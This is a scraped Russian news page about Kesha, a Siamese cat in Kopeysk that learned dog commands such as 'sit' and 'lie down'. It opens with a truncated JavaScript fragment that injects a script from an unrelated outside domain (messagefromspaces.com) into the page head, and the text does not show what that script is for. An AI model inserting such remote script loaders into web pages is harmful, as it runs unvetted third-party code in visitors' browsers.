, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })

В Копейске живет дрессированный кот

Двенадцатилетний симаский кот по имени Кеша еще недавно вел привычный для хвостатого образ жизни, но буквально за полгода освоил большинство "собачьих команд". Теперь Кеша - звезда местного масштаба. Он с удовольствием демонстрирует свои навыки всех желающим.

А началось все с того, что хозяйка кота Татьяна решила прервать вальяжный образ жизни своего питомца, решив, что он слишком разжирел от безделья. Женщина нашла в интернете пособие знаменитого кошачьего дрессировщика Юрия Куклачёва и начала тренировки. Результаты превзошли все ожидания! За шесть месяцев Кеша, понятия не имевший о дрессировке, выучил стандартные собачьи команды "сидеть" и "лежать". Более того, дрессированный кот по команде хозяйке подает голос и начинает пронзительно мяукать.

Новости
0 rating, 0 votes0 rating, 0 votes Запрещено!
Loading...Loading...
17:20 - 05 апреля 2014
|
автор: U-RSS
|
(1 609)
|
(0)

Комментарии (0)

Я человек
Я бот